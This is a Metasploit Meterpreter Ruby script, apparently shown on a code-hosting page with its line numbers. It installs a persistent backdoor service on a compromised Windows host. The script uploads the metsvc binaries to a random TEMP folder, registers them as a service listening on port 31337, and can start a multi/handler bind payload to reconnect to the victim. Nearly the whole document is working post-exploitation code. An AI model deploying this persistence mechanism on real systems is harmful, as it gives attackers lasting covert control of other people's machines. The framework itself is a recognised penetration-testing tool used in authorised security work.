Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
3
# If you'd like to improve this script, please try to port it as a post
4
# module instead. Thank you.
5
##
6

7

8

9
#
10
# Meterpreter script for installing the meterpreter service
11
#
12

13
session = client
14

15
#
16
# Options
17
#
18
opts = Rex::Parser::Arguments.new(
19
  "-h"  => [ false,  "This help menu"],
20
  "-r"  => [ false,  "Uninstall an existing Meterpreter service (files must be deleted manually)"],
21
  "-A"  => [ false,  "Automatically start a matching exploit/multi/handler to connect to the service"]
22
)
23

24
# Exec a command and return the results
25
def m_exec(session, cmd)
26
  r = session.sys.process.execute(cmd, nil, {'Hidden' => true, 'Channelized' => true})
27
  b = ""
28
  while(d = r.channel.read)
29
    b << d
30
  end
31
  r.channel.close
32
  r.close
33
  b
34
end
35

36
#
37
# Default parameters
38
#
39

40
based    = File.join(Msf::Config.data_directory, "meterpreter")
41
rport    = 31337
42
install  = false
43
autoconn = false
44
remove   = false
45
if client.platform == 'windows'
46

47
  #
48
  # Option parsing
49
  #
50
  opts.parse(args) do |opt, idx, val|
51
    case opt
52
    when "-h"
53
      print_line(opts.usage)
54
      raise Rex::Script::Completed
55
    when "-A"
56
      autoconn = true
57
    when "-r"
58
      remove = true
59
    end
60
  end
61

62
  #
63
  # Create the persistent VBS
64
  #
65

66
  if(not remove)
67
    print_status("Creating a meterpreter service on port #{rport}")
68
  else
69
    print_status("Removing the existing Meterpreter service")
70
  end
71

72
  #
73
  # Upload to the filesystem
74
  #
75

76
  tempdir = client.sys.config.getenv('TEMP') + "\\" + Rex::Text.rand_text_alpha(rand(8)+8)
77

78
  print_status("Creating a temporary installation directory #{tempdir}...")
79
  client.fs.dir.mkdir(tempdir)
80

81
  # Use an array of `from -> to` associations so that things
82
  # such as metsrv can be copied from the appropriate location
83
  # but named correctly on the target.
84
  bins = {
85
    'metsrv.x86.dll'    => 'metsrv.dll',
86
    'metsvc-server.exe' => nil,
87
    'metsvc.exe'        => nil
88
  }
89

90
  bins.each do |from, to|
91
    next if (from != "metsvc.exe" and remove)
92
    to ||= from
93
    print_status(" >> Uploading #{from}...")
94
    fd = client.fs.file.new(tempdir + "\\" + to, "wb")
95
    path = (from == 'metsrv.x86.dll') ? MetasploitPayloads.meterpreter_path('metsrv','x86.dll') : File.join(based, from)
96
    fd.write(::File.read(path, ::File.size(path), mode: 'rb'))
97
    fd.close
98
  end
99

100
  #
101
  # Execute the agent
102
  #
103
  if(not remove)
104
    print_status("Starting the service...")
105
    client.fs.dir.chdir(tempdir)
106
    data = m_exec(client, "metsvc.exe install-service")
107
    print_line("\t#{data}")
108
  else
109
    print_status("Stopping the service...")
110
    client.fs.dir.chdir(tempdir)
111
    data = m_exec(client, "metsvc.exe remove-service")
112
    print_line("\t#{data}")
113
  end
114

115
  if(remove)
116
    m_exec(client, "cmd.exe /c del metsvc.exe")
117
  end
118

119
  #
120
  # Setup the exploit/multi/handler if requested
121
  #
122
  if(autoconn)
123
    print_status("Trying to connect to the Meterpreter service at #{client.session_host}:#{rport}...")
124
    mul = client.framework.exploits.create("multi/handler")
125
    mul.datastore['WORKSPACE'] = client.workspace
126
    mul.datastore['PAYLOAD'] = "windows/metsvc_bind_tcp"
127
    mul.datastore['LPORT']   = rport
128
    mul.datastore['RHOST']   = client.session_host
129
    mul.datastore['ExitOnSession'] = false
130
    mul.exploit_simple(
131
      'Payload'        => mul.datastore['PAYLOAD'],
132
      'RunAsJob'       => true
133
    )
134
  end
135

136
else
137
  print_error("This version of Meterpreter is not supported with this Script!")
138
  raise Rex::Script::Completed
139
end
140

141